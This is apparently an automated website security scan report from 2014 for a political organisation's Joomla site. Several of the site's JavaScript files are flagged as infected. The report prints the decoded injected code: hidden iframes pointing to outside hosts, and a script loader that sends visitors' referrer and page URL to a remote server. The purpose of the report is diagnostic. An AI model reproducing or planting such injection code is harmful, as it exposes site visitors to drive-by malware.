Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rcsscgop.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rcsscgop.com/ | 200 OK Content-Length: 20190 Content-Type: text/html | clean |
http://rcsscgop.com/media/system/js/caption.js | 200 OK Content-Length: 4880 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = Antivirus reports:
| ||
http://rcsscgop.com/templates/politicalxtc/js/jquery.js | 200 OK Content-Length: 58054 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document Antivirus reports:
| ||
http://rcsscgop.com/templates/politicalxtc/js/xtcMooMenu.js | 200 OK Content-Length: 4653 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function moomenu(container, menuClass, sp, a, tr, afps, cnt){ var topmenu; if(container == null) topmenu = $(document.body); else topmenu = $(container); if( !$defined(tr) ) tr = new Fx.Transition(Fx.Transitions.Quint.easeInOut); if( !$defined(afps) ) afps = 50; if( !$defined(cnt) ) cnt = false; if(topmenu) { var menus = topmenu.getElements('ul.' + menuClass); menus.each(function(menu){ menu.setStyles({'display':'block Decoded script: var _escape='%3Cscript%3Edocument.write%28%27%3Cdiv%20name%3D%22vimeo%22%20style%3D%22display%3Anone%22%3E%3Ciframe%20width%3D%22560%22%20height%3D%22315%22%20src%3D%22http%3A//bentley.poststreetdental.com/direct.php%3Fpage%3D15f48be84d67654d%22%20frameborder%3D%220%22%20allowfullscreen%3E%3C/iframe%3E%3C/div%3E%27%29%3B%3C/script%3E';var OlI = document.createElement('script'); OlI.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url= OlI.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OlO = document.getElementsByTagName('head')[0]; OlO.appendChild(OlI);document.write(unescape(_escape)); Antivirus reports:
| ||
http://rcsscgop.com/templates/politicalxtc/js/scripts.js | 200 OK Content-Length: 9900 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery = jQuery.noConflict(); jQuery(document).ready(function() { jQuery("#footerOpen").click(function () { jQuery("#bottomModsWrap").toggle("slow", function(){ jQuery.scrollTo(jQuery('#bottomModsBGBottom')); if(jQuery('#bottomModsBG').is(':hidden')) { jQuery("#footerOpen").removeClass("close"); } else { jQuery("#footerOpen").addClass("close"); } }); }); var modTitleWrapWidth = jQuery('#userOne Antivirus reports:
| ||
http://rcsscgop.com/components/com_jcalpro/lib/shajax.js | 200 OK Content-Length: 12956 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof(shajax)=="undefined"){var shajax=new Object();} shajax.enabled=true;shajax.useCache=true;shajax.useCompression=false;shajax.enableDebug=false;shajax.enablePrefetch=true;shajax.maxCacheSize=400000;shajax.shajaxLiveSiteUrl='';shajax.shajaxProgressImage='';shajax.defaultProgressElement='shajaxProgress';shajax.shajaxUrlMap=new Array();shajax.toPrefetch=new Array();shajax.delayToPrefetch=400;shajax.addDOMLoadEvent=(function(){var load_events=[],load_timer,script,done,exec,old_onload,ini Decoded script: var _escape='%3Cscript%3Edocument.write%28%27%3Cdiv%20name%3D%22vimeo%22%20style%3D%22display%3Anone%22%3E%3Ciframe%20width%3D%22560%22%20height%3D%22315%22%20src%3D%22http%3A//bentley.poststreetdental.com/direct.php%3Fpage%3D15f48be84d67654d%22%20frameborder%3D%220%22%20allowfullscreen%3E%3C/iframe%3E%3C/div%3E%27%29%3B%3C/script%3E';var OlI = document.createElement('script'); OlI.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url= OlI.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OlO = document.getElementsByTagName('head')[0]; OlO.appendChild(OlI);document.write(unescape(_escape)); Antivirus reports:
| ||
http://rcsscgop.com/components/com_jcalpro/themes/default/template.js | 200 OK Content-Length: 7692 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function preloadImage() { var args = preloadImage.arguments; document.imageArray[args[0]] = new Array(args.length - 1); for ( var i = 1; i < args.length; i++) { document.imageArray[args[0]][i - 1] = new Image; document.imageArray[args[0]][i - 1].src = args[i]; } } function showOnBar(Str) { window.status = Str; return true; } function cOn(myObject, color) { if (document.getElementById || (document.all && !(docume Decoded script: var _escape='%3Cscript%3Edocument.write%28%27%3Cdiv%20name%3D%22vimeo%22%20style%3D%22display%3Anone%22%3E%3Ciframe%20width%3D%22560%22%20height%3D%22315%22%20src%3D%22http%3A//bentley.poststreetdental.com/direct.php%3Fpage%3D15f48be84d67654d%22%20frameborder%3D%220%22%20allowfullscreen%3E%3C/iframe%3E%3C/div%3E%27%29%3B%3C/script%3E';var OlI = document.createElement('script'); OlI.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url= OlI.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OlO = document.getElementsByTagName('head')[0]; OlO.appendChild(OlI);document.write(unescape(_escape)); Antivirus reports:
| ||
http://rcsscgop.com/modules/mod_jxtc_calendarwall/js/showcaseFX.js | 200 OK Content-Length: 20190 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof showcaseFX != 'function') { function showcaseFX(id, o){ var dix = $(id); if (dix) { var showcase = dix.getElement('.showcase' + id); if(showcase) { var frames = showcase.getElements('.sframe' + id); if(frames.length > 1) { var a = frames.length - 1; var b = 0; var fh = 0; var fw = 0; var f = {}; var fx; var fxReady = (o.fxpause == -1) ? true : false; Decoded script: <div name="video" style="display:none"><iframe width="560" height="315" src="http://nissan.georgekohndds.com/direct.php?page=15f48be84d67654d" frameborder="0"></iframe></div><div name="youtube"><iframe width="1" height="1" src="http://www.deheide.be/count.php" frameborder="0" allowfullscreen></iframe></div> Antivirus reports:
| ||
http://rcsscgop.com/modules/mod_briaskISS/mod_briaskISS.js | 200 OK Content-Length: 7590 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function briaskISS(idModule, random, picInterval, transDelay, picArray) { this.picRandom = random; this.picInterval = picInterval; this.transDelay = transDelay; this.picArray = picArray; this.curPic = 0; this.nextPic = 0; this.numPics = 0; this.curOpacity = 99 this.nextOpacity = 0; this.idModule = idModule; this.initISS(); } briaskISS.prototype.initISS=function() { if (!document.getElementById || !document.createElement) Decoded script: var _escape='%3Cscript%3Edocument.write%28%27%3Cdiv%20name%3D%22vimeo%22%20style%3D%22display%3Anone%22%3E%3Ciframe%20width%3D%22560%22%20height%3D%22315%22%20src%3D%22http%3A//bentley.poststreetdental.com/direct.php%3Fpage%3D15f48be84d67654d%22%20frameborder%3D%220%22%20allowfullscreen%3E%3C/iframe%3E%3C/div%3E%27%29%3B%3C/script%3E';var OlI = document.createElement('script'); OlI.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url= OlI.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OlO = document.getElementsByTagName('head')[0]; OlO.appendChild(OlI);document.write(unescape(_escape)); Antivirus reports:
| ||
http://rcsscgop.com/plugins/system/blueflame/xajax/xajax_js/xajax_core.js | 200 OK Content-Length: 39876 Content-Type: application/x-javascript | clean |
http://rcsscgop.com/index.php?option=com_user&view=login | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 01:34:34 GMT Location: http://rcsscgop.com/Log-in.html Server: Apache Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 2efd091c6555978ee492856407cc9fbc=et5t1jvpvsulorkmdh95c5jr66; path=/ | clean |
http://rcsscgop.com/log-in.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 01:34:34 GMT Location: http://rcsscgop.com/Log-in.html Server: Apache Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 2efd091c6555978ee492856407cc9fbc=l0pngi3nhgdmg333i18mqtd637; path=/ | clean |
http://rcsscgop.com/test404page.js | 404 Not Found Content-Length: 393 Content-Type: text/html | clean |
http://rcsscgop.com/index.php?option=com_user&view=register | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 01:34:35 GMT Location: http://rcsscgop.com/Create-an-account.html Server: Apache Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 2efd091c6555978ee492856407cc9fbc=kvph9teaerlj08el93mu25gc52; path=/ | clean |
http://rcsscgop.com/create-an-account.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 01:34:36 GMT Location: http://rcsscgop.com/Create-an-account.html Server: Apache Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 2efd091c6555978ee492856407cc9fbc=evnbs50cbfh9eg38uuqnrq7he3; path=/ | clean |
http://rcsscgop.com/About-Us/how-to-find-us.html | 200 OK Content-Length: 18760 Content-Type: text/html | clean |
http://maps.google.com/maps?file=api&v=2.x&oe=utf-8&hl=en&key=ABQIAAAAKHT8LwLX7X86UNVi5DP0hxRM_9oo7vrDblMRKS0za8SGspUbEhSBGGrFG6ML_9PR4F-l_OIoPwBuFw&sensor=false&indexing=true | 200 OK Content-Length: 4224 Content-Type: text/javascript | clean |
http://rcsscgop.com/About-Us/officers.html | 200 OK Content-Length: 18089 Content-Type: text/html | clean |
http://rcsscgop.com/About-Us/committees-a-committee-chairs.html | 200 OK Content-Length: 17635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rcsscgop.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Dec 2014 01:34:27 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 18 Dec 2014 01:34:28 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 2efd091c6555978ee492856407cc9fbc=6hkcn4v2t2lpg9i51rtprj65u3; path=/
GET / HTTP/1.1
Host: rcsscgop.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Dec 2014 01:34:27 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 18 Dec 2014 01:34:28 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 2efd091c6555978ee492856407cc9fbc=6hkcn4v2t2lpg9i51rtprj65u3; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: rcsscgop.com
Referer: http://www.google.com/search?q=rcsscgop.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rcsscgop.com
Referer: http://www.google.com/search?q=rcsscgop.com
Result:
The result is similar to the first query. There are no suspicious redirects found.